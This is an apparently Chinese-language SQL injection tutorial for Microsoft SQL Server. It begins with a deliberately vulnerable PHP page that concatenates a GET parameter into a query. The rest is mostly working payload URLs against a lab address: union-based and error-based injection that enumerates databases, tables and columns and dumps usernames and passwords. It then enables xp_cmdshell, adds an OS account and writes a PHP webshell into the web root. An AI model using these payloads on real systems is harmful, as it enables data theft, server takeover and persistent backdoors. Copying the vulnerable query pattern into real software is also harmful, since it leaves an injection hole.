连接mssql源码
<?php
$conn = sqlsrv_connect('localhost',array('Database' => 'test','UID' => 'sa','PWD' => '123.com'));
if($conn == false){
var_dump(sqlsrv_errors());
exit;
}
$id = $_GET["id"];
$sql = "select * from users where id = '$id'";
$result = sqlsrv_query($conn,$sql);
var_dump(sqlsrv_errors());
$row = sqlsrv_fetch_array($result);
if($row){
echo "<pre>";
echo "username:".$row['username'];
echo "<br>";
echo "password:".$row['password'];
}else{
echo "error";
}
?>
union联合注入
测注入点
http://192.168.1.102/a.php?id=1' and 1=1-- -
http://192.168.1.102/a.php?id=1' and 1=2-- -
查数据表字段数
http://192.168.1.102/a.php?id=1' order by 3-- -
查看当前数据库用户权限
爆库名
查看当前数据库名称
查询数据库数量
http://192.168.1.102/a.php?id=0' union select null,null,(select count(name) from sys.databases)-- -
查询数据库第一个数据库名称
http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from sys.databases)-- -
查询数据库第二个数据库名称
http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from sys.databases where name!='master')-- -
查询数据库第三个数据库名称
http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from sys.databases where name!='master' and name!='model')-- -
爆表名
查看数据库所有表的数量
查看用户创建表的数量
http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 count(name) from sysobjects where xtype='u')-- -
查看用户创建表的名称
爆字段
查看users表的第一个字段名称
http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from syscolumns where id=object_id('users'))-- -
查看users表的第二个字段名称
http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from syscolumns where id=object_id('users') and name!='id')-- -
查看users表的第三个字段名称
http://192.168.1.102/a.php?id=0' union select null,null,(select top 1 name from syscolumns where id=object_id('users') and name!='id' and name!='username')-- -
拖库
查看users表的第一条数据
http://192.168.1.102/a.php?id=0' union select null,username,password from users-- -
查看users表的第二条数据
http://192.168.1.102/a.php?id=0' union select null,username,password from users where username!='lisi'-- -
报错注入
爆库名
http://192.168.1.102/a.php?id=0' and 1=convert(int,(db_name()))-- -
爆表名
http://192.168.1.102/a.php?id=0' and 1=convert(int,(select top 1 name from sys.sysobjects where xtype='u'))-- -
爆字段
http://192.168.1.102/a.php?id=0' and 1=convert(int,(select top 1 name from sys.syscolumns where id=object_id('users')))-- -
拖库
http://192.168.1.102/a.php?id=0' and 1=convert(int,(select top 1 username+'~'+password from users))-- -
本地命令执行
开启高级功能,开启xp_cmdshell
use master;
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
执行命令
exec master..xp_cmdshell'whoami';
关闭xp_cmdshell,关闭高级功能
exec sp_configure "xp_cmdshell",0;
reconfigure;
exec sp_configure 'show advanced options',0;
reconfigure;
远程命令执行
开启高级功能,开启xp_cmdshell
http://192.168.1.102/a.php?id=1';use master;exec sp_configure"show advanced options",1;reconfigure;exec sp_configure"xp_cmdshell",1;reconfigure-- -
远程命令执行,添加用户
http://192.168.1.102/a.php?id=1';exec master..xp_cmdshell"net user hnb 123.com /add"-- -
通过远程命令在服务器主目录下植入木马
http://192.168.1.102/a.php?id=1';exec master..xp_cmdshell"echo ^<?php @assert($_POST[666]) ?^>>C:\phpStudy\PHPTutorial\WWW\\e.php"-- -